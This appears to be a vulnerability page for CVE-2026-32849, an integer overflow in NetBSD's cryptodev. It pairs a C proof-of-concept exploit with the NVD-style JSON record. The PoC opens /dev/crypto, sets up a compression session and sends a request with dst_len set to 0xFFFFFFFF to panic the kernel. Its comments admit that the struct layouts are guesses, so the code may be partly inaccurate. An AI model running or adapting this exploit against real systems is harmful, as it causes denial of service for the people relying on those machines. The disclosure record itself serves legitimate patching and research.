CVE-2026-32849

/* * PoC for CVE-2026-32849 * This code attempts to trigger the integer overflow in NetBSD cryptodev. * Compile: gcc -o poc_netbsd_crypto poc_netbsd_crypto.c */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <sys/types.h> // Definitions might vary based on specific NetBSD version headers #define CIOCCRYPT _IOWR('d', 101, struct crypt_op) #define CIOCGSESSION _IOWR('d', 102, struct session_op) #ifndef CRIO_COMP #define CRIO_COMP 0 #endif struct session_op { uint32_t cipher; uint32_t mac; uint32_t keylen; void *key; uint32_t mackeylen; void *mackey; uint32_t ses; // Session ID returned }; struct crypt_op { uint32_t ses; uint16_t op; uint16_t flags; void *src; void *dst; size_t len; void *iv; // The vulnerable field is dst_len in some contexts or derived from len // In this specific PoC we simulate the overflow condition via the // structure member that maps to the kernel's cop->dst_len size_t dst_len; }; int main() { int fd = -1; struct session_op sess; struct crypt_op cop; // Open the crypto device fd = open("/dev/crypto", O_RDWR); if (fd < 0) { perror("open /dev/crypto"); return 1; } printf("[+] Opened /dev/crypto\n"); // Setup a session (Compression type as per vulnerability description) memset(&sess, 0, sizeof(sess)); sess.cipher = CRIO_COMP; // Targeting compression session if (ioctl(fd, CIOCGSESSION, &sess) < 0) { perror("ioctl(CIOCGSESSION)"); close(fd); return 1; } printf("[+] Session created with ID: %d\n", sess.ses); // Prepare the operation to trigger the overflow memset(&cop, 0, sizeof(cop)); cop.ses = sess.ses; cop.src = (void *)0x1000; // Dummy address cop.dst = (void *)0x2000; // Dummy address cop.len = 0; cop.op = 0; // COP_ENCRYPT or similar // Trigger the vulnerability: // Assign a value > INT_MAX to dst_len. // In the kernel, iov_len (signed int) = cop->dst_len (unsigned). // This causes signed integer overflow. cop.dst_len = 0xFFFFFFFF; // 4294967295 printf("[+] Sending malicious request with dst_len = 0x%zx\n", cop.dst_len); printf("[!] This will likely cause a Kernel Panic (DoS).\n"); // Execute the ioctl if (ioctl(fd, CIOCCRYPT, &cop) < 0) { perror("ioctl(CIOCCRYPT)"); // If ioctl fails due to validation, panic might be avoided, // but the description suggests it leads to panic directly or via UB. } close(fd); return 0; }

{"cve": {"id": "CVE-2026-32849", "sourceIdentifier": "[email protected]", "published": "2026-05-18T18:17:23.377", "lastModified": "2026-05-18T19:42:03.353", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NetBSD prior to commit ec8451e contains a signed integer overflow vulnerability in the cryptodev_op() function in sys/opencrypto/cryptodev.c where the local variable iov_len is declared as a signed int but assigned from an unsigned cop->dst_len value, causing undefined behavior when cop->dst_len exceeds INT_MAX. A local attacker with access to /dev/crypto and a compression session type can exploit this vulnerability by providing a dst_len value exceeding INT_MAX to trigger a kernel panic through NULL pointer dereference when CONFIG_SVS is disabled and corrupted UIO pointer arithmetic."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f", "source": "[email protected]"}, {"url": "https://nasm.re/posts/uaf_netbsd_crypto/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c", "source": "[email protected]"}]}}